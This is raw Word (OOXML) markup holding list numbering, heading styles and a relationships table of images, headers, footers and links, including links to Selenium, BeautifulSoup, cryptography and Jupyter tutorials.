      <w:lvlText w:val="▪"/>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E5C3D1E">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4504390">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CC825E8">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36C13A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FF082E8">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6AC46726">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37C3216"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="660E8998"/>
    <w:lvl w:ilvl="0" w:tplc="F85EE7C8">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7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7738378C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="14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6B32D5C8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="21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58C2F24">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="28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05A4D17C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="36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0ACA58AE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="43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7E1EAB36">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="50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B8087E7E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="57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3E86FF3A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="64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52B33ED"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7AC418D6"/>
    <w:lvl w:ilvl="0" w:tplc="2862A86E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2294"/>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1" w:tplc="0E9AAF00">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="302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2" w:tplc="4330D810">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="374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3" w:tplc="80108D50">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="446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4" w:tplc="D46A7854">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="518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5" w:tplc="C3FABFF6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="590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6" w:tplc="BA9EC67E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="662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7" w:tplc="43EADD4C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="734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lvl w:ilvl="8" w:tplc="642C5026">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8066"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:b/>
        <w:bCs/>
        <w:i w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:color w:val="5B9BD4"/>
        <w:sz w:val="32"/>
        <w:szCs w:val="32"/>
        <w:u w:val="none" w:color="000000"/>
        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="2101834620">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="277831540">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="34427225">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="443840334">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1777749803">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1451319946">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="433676528">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="888537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B52"/>
    <w:rsid w:val="008D2B00"/>
    <w:rsid w:val="00A90250"/>
    <w:rsid w:val="00C02E4D"/>
    <w:rsid w:val="00F97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2D79F"/>
  <w15:docId w15:val="{186D0093-4182-4ED9-8376-30D84CA4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ind w:left="10" w:hanging="10"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
      <w:b/>
      <w:color w:val="6F2F9F"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="3"/>
      <w:ind w:left="10" w:hanging="10"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
      <w:b/>
      <w:color w:val="6F2F9F"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="0"/>
      <w:ind w:left="101"/>
      <w:outlineLvl w:val="2"/>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8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:link w:val="Heading1"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
      <w:b/>
      <w:color w:val="6F2F9F"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:link w:val="Heading2"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
      <w:b/>
      <w:color w:val="6F2F9F"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:hidden/>
    <w:pPr>
      <w:spacing w:after="99"/>
      <w:ind w:left="25" w:right="76" w:hanging="10"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:b/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:hidden/>
    <w:pPr>
      <w:spacing w:after="98"/>
      <w:ind w:left="730" w:right="91" w:hanging="10"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:b/>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2.jpg"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.jpg"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer6.xml"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.jpg"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image61.jpeg"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image97.jpg"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.selenium.dev/docs" TargetMode="External"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=JmiUyPCkZ2Y" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer10.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://drive.google.com/file/d/1ZX3Q2HqnJjcMUabaCiibDIr5U2CYul-P/view?usp=share_link" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.jpg"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.jpeg"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image87.jpg"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.example.com/frame-page" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer7.xml"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crummy.com/software/BeautifulSoup/bs4/doc/" TargetMode="External"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header20.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.jpg"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.jpg"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.jpg"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image83.jpeg"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image98.jpg"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image62.jpg"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image105.jpg"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=JmiUyPCkZ2Y" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://drive.google.com/file/d/1ZX3Q2HqnJjcMUabaCiibDIr5U2CYul-P/view?usp=share_link" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer11.xml"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image88.jpeg"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.jpeg"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.jpg"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer8.xml"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image99.jpeg"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crummy.com/software/BeautifulSoup/bs4/doc/" TargetMode="External"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer19.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.jpeg"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image84.jpg"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.jpeg"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.jpeg"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image63.jpeg"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image89.jpg"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image106.jpeg"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=KTxsBW9SkOU" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://drive.google.com/file/d/1ZX3Q2HqnJjcMUabaCiibDIr5U2CYul-P/view?usp=share_link" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.jpg"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer4.xml"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header12.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.jpe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header" Target="header9.xml"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image75.jpeg"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image85.jpeg"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer14.xml"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image100.jpeg"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.example.com/frame-page" TargetMode="External"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.dataquest.io/blog/jupyter-notebook-tutorial/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.jpg"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image69.jpeg"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.tutorialspoint.com/cryptography/index.htm" TargetMode="External"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer20.xml"/><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jpeg"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer5.xml"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.jpg"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.jpeg"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image64.jpg"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer12.xml"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image80.jpg"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image90.jpeg"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image95.jpg"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image112.jpeg"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header18.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.jpg"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image59.jpeg"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image107.jpg"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=KTxsBW9SkOU" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.jpg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://drive.google.com/file/d/1ZX3Q2HqnJjcMUabaCiibDIr5U2CYul-P/view?usp=share_link" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.jpeg"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.jpg"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image71.jpeg"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header10.xml"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header15.xml"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.example.com/frame-page" TargetMode="External"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.dataquest.io/blog/jupyter-notebook-tutorial/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.jpg"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.jpeg"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header7.xml"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer9.xml"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image86.jpg"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image101.jpg"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.tutorialspoint.com/cryptography/index.htm" TargetMode="External"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header21.xml"/><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23.jpeg"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.jpg"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image81.jpeg"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image96.jpeg"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.selenium.dev/docs" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.jpg"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header6.xml"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.jpeg"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image60.jpg"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image65.jpeg"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image76.jpg"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image91.jpg"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image108.jpeg"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header16.xml"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer18.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.jpg"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.jpg"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header11.xml"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer15.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://drive.google.com/file/d/1ZX3Q2HqnJjcMUabaCiibDIr5U2CYul-P/view?usp=share_link" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.jpeg"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.jpg"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.jpeg"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header8.xml"/><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header" Target="header13.xml"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image102.jpeg"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.example.com/frame-page" TargetMode="External"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.dataquest.io/blog/jupyter-notebook-tutorial/" TargetMode="External"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.dataquest.io/blog/jupyter-notebook-tutorial/" TargetMode="External"/><Relationship Id="rId185"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19.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.jpg"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.jpg"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.jpeg"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image66.jpg"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image77.jpeg"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image92.jpeg"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image109.jpg"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header17.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.jpeg"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header4.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.jpeg"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.jpg"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image73.jpeg"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header14.xml"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image103.jpg"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image67.jpeg"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.dataquest.io/blog/jupyter-notebook-tutorial/" TargetMode="External"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.jpg"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.jpeg"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.jpg"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image78.jpg"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image93.jpg"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57.jpeg"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image110.jpg"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer16.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.jpg"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header5.xml"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.jpg"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image74.jpg"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer13.xml"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.jpeg"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image68.jpg"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image104.jpeg"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.dataquest.io/blog/jupyter-notebook-tutorial/"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17.jpg"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.jpg"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image79.jpeg"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.jpeg"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image58.jpg"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image94.jpeg"/><Relationship Id="rId156" 